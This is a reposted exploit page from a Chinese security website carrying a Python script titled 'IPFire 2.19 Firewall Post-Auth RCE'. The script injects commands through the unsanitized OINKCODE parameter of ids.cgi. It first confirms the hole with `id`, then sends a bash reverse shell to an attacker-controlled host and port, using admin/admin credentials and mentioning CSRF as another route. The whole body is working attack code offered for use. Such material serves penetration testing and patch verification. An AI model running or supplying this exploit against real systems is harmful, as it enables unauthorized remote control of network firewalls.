首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IPFire 2.19 - Remote Code Execution
来源:https://twitter.com/0x09AL 作者:0x09AL 发布时间:2017-06-13  
#
# Title :  IPFire 2.19 Firewall Post-Auth RCE
# Date : 09/06/2017
# Author : 0x09AL (https://twitter.com/0x09AL)
# Tested on: IPFire 2.19 (x86_64) - Core Update 110
# Vendor : http://www.ipfire.org/
# Software : http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso
# Vulnerability Description:
# The file ids.cgi doesn't sanitize the OINKCODE parameter and gets passed to a system call which call wget.
# You need valid credentials to exploit this vulnerability or you can exploit it through CSRF.
#
#
 
import requests
 
 
# Adjust the ip and ports.
 
revhost = '192.168.56.1'
revport = 1337
url = 'https://192.168.56.102:444/cgi-bin/ids.cgi'
username = 'admin'
password = 'admin'
 
 
payload = 'bash -i >& /dev/tcp/' + revhost + '/' + str(revport) + ' 0>&1'
evildata = {'ENABLE_SNORT_GREEN':'on','ENABLE_SNORT':'on','RULES':'registered','OINKCODE': '`id`','ACTION': 'Download new ruleset','ACTION2':'snort'}
headers = {'Accept-Encoding' : 'gzip, deflate, br','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','User-Agent':'IPFIRE Exploit','Referer': url,'Upgrade-Insecure-Requests':'1'}
 
 
def verifyVuln():
    req = requests.post(url,data=evildata,headers=headers,auth=(username,password),verify=False) # Verify false is added because most of the time the certificate is self signed.
    if(req.status_code == 200 and "uid=99(nobody)" in req.text):
        print "[+] IPFire Installation is Vulnerable [+]"
        revShell()
    else:
        print "[+] Not Vulnerable [+]"
 
def revShell():
    evildata["OINKCODE"] = '`' + payload + '`'
    print "[+] Sending Malicious Payload [+]"
    req = requests.post(url,data=evildata,headers=headers,auth=(username,password),verify=False)
 
    
verifyVuln()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple macOS - Disk Arbitration
·VMware vSphere Data Protection
·Apple macOS 10.12.3 / iOS < 10
·EFS Easy Chat Server 3.1 - Pas
·Mapscrn 2.03 - Local Buffer Ov
·EFS Easy Chat Server 3.1 - Pas
·VMware Workstation 12 Pro - De
·EFS Easy Chat Server 3.1 - Buf
·Windows UAC Protection Bypass
·Disk Sorter 9.7.14 - 'Input Di
·Mikrotik RouterOS 6.28 FTP Buf
·Logpoint < 5.6.4 - Unauthentic
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved